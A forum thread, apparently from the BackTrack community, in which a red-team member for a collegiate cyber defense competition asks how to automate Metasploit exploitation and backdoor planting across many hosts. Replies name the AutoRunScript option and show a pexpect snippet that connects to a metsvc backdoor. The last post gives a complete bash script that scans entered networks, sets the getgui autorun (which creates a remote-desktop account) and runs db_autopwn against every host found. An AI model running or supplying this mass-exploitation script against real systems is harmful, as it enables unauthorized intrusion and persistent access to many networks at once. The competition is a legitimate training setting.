Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: db_autopwn post exploitation

  1. #1
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    3

    Default

    I have a query on on the db_autopwn function of metasploit. For the past 2 years I have been participating in the Collegiate Cyber Defense Competition . It is comprised of two teams the white teams and the red team. White team works on defense and red team is on offense. The problem we have had the past 2 years is there is only 1 red team (Me and 3 other guys) and 6+ white teams.

    Basically we show up on the competition day and allow the white teams 1 hours to secure there networks. Each white team has 5+ servers with known vulnerabilities and misconfiguration like blank sa password. We developed a custom application that monitors the up time and availability of all the white team services and automatically scores them based on those factors. It also checks that files don't change (like when we change the files in the ftp or www roots). So if a team get's compromised and service's are effected they start loosing points. The team with the most points at the end of the day wins.

    Now the issue we have had is we are manually attacking each system one by one. So some teams are unfairly attacked more or just more time is being spent on them. Thus some teams are getting slammed all day while others are barely being attacked. My idea is to perform a full Nessus or Open VAS scan during the first hour while they are securing their systems. After that I will import this into db_autopwn and automatically exploit the 30+ systems. The problem is I need to plant a backdoor on the system so the other red team members can connect quickly and start going after services. Obviously it wold take a long time to do this manually on each machine. So ideally I would like to run db_autopwn, but some how specify a meterpreter script to automatically run after successfully exploiting each host. I would like to upload 2 files via meterpreter and then execute them or automatically run the new metsrvc.rb script.

    Do you know of any way to achieve this?

    Thank you for your time

    Josh

    No one has any idea on this??

    Automating a post db_autopwn task?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    No bumping please, if someone can help you they will.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO Track404's Avatar
    Join Date
    Nov 2009
    Posts
    23

    Default

    I Think you probably can achieve this by altering the very same python script that Fasttrack uses for it's autopwn feature.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    You answered your own question. The way to do it is write a custom ruby script to complete the task you need. There are lots of them already included so jsut grab one and hack away.

  5. #5
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    I know this is pretty bad to say ... but honestly how in the hell can you NOT know how to this if youve been at this 2+ years ... I mean seriously!

    Not only that, but did you even read metasploit unleashed ??

    set AutoRunScript /pentest/exploits/framework3/scripts/meterpreter/YOURCUSTOMSCRIPT.rb

    or better yet uploadexec.rb
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  6. #6
    Just burned his ISO Track404's Avatar
    Join Date
    Nov 2009
    Posts
    23

    Default

    Just to clear things up, I offered my suggestion to the creater of this thread. I knew it was possible to do some how by looking at other scripts for ideas.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    3

    Default

    Track404 Thank you for your response.

    Are you saying I should copy the python script from fast track into metasploit??

    vvpalin: Sorry I have not been working on this for 2 years straight. Just 1 week before the competition each year.
    Just to be clear I can run:

    set AutoRunScript /pentest/exploits/framework3/scripts/meterpreter/YOURCUSTOMSCRIPT.rb

    and this will set the auto run script that db_autopwn will use??

    I know this will set the autorunscript when choosing a meterpreter payload, but did not know it was an option under db_autopwn.

    Is there any documentation on this?

    I have looked at metasploit unleased, but see nothing about using this with db_autopwn

    Also do you know a way to simply automate 3 -4 meterpreter commands??

    If I could have it automatically run a few upload commands followed by 1 execute command that would work perfect.

    I am talking about the build in meterpreter upload and execute commands.

  8. #8
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Use the edit button, do not make multiple consecutive posts.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #9
    Just burned his ISO Track404's Avatar
    Join Date
    Nov 2009
    Posts
    23

    Default

    Riverluck123:

    I could be wrong but I suggested that you look at the script Fasttrack uses and alter it to fit your needs. For instance if you had already compromised a computer with Metsvc and you wanted to easily connect to port 313337 than one way of doing it would be the following snip:

    # use exploit/multi/handler
    child1.sendline ('use exploit/multi/handler')
    # set PAYLOAD windows/metsvc_bind_tcp
    child1.sendline ('set PAYLOAD windows/metsvc_bind_tcp')
    # set LPORT 31337
    child1.sendline ('set LPORT 31337')
    # set RHOST IP ADDRESS
    child1.sendline ('set RHOST IP ADDRESS')
    # run actual exploit
    child1.sendline ('exploit')

    I Think both Vvpalin and Pureh@te provided you with enough information to accomplish your goal. As for me I'm a newbie to all of this.

    Good luck

  10. #10
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    3

    Default

    Thank you everyone for pointing me in the right direction.

    I was able to accomplish my goal. I made a very simple meterpreter script that uploaded the files I needed by means of the setautorunscript option.

    I then made a simple bash script to automate the thing ever further. This enables me to enter the 4-5 networks at once and go. It needs alot of work, but will do what I need.Thanks again

    Code: You would need to modify the setautorunscript part to your liking, but other than that it should be ready to go.

    #!/bin/bash

    clear
    rm auto.rc
    touch auto.rc

    echo "################################################# #####"
    echo "################################################# #####"
    echo "####### Welcome to the AutoPwn Script ########"
    echo "################################################# #####"
    echo "################################################# #####"
    echo " "
    echo "############################"
    echo "### Creating Attack File ###"
    echo "############################"
    echo " "
    echo "db_destroy auto1" >> auto.rc

    echo "db_create auto1" >> auto.rc

    echo "db_connect auto1" >> auto.rc

    var1=0

    while [ "$var1" -ne 1 ]
    do
    echo "################################################# #"
    echo "##### Enter the Network or IP address to attack! #"
    echo "##### Example: 192.168.1.1 or 192.168.1.1/24 #####"
    echo "################################################# #"
    echo " "
    echo -n "IP / Network: "
    read ipa

    if [ -z "$ipa" ]
    then
    ipa="192.168.1.1/24"
    echo "No IP Entered, Defualt 192.168.1.1/24 used"
    else
    echo "IP or Network Added!"
    fi

    echo "db_nmap $ipa" >> auto.rc

    echo " "
    echo "##################################"
    echo "## Current Attack File Contents ##"
    echo "##################################"
    echo " "
    echo "############################"
    cat auto.rc
    echo "############################"
    echo " "

    echo "Do you want to enter another IP or Network? Enter 0 or 1:"
    echo "0) Yes Enter another IP or Network"
    echo "1) No Continue and launch attacks"
    echo -n "Selection: "
    read var1

    if [ -z "$var1" ]
    then
    var1=0
    fi

    done

    echo "db_hosts" >> auto.rc

    echo "set autorunscript getgui" >> auto.rc

    echo "db_autopwn -t -p -e -b" >> auto.rc

    echo "#######################"
    echo "###Launching Attacks###"
    echo "#######################"
    echo " "
    echo "Metasploit will now be launched"

    /pentest/exploits/framework3/msfconsole -r auto.rc

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •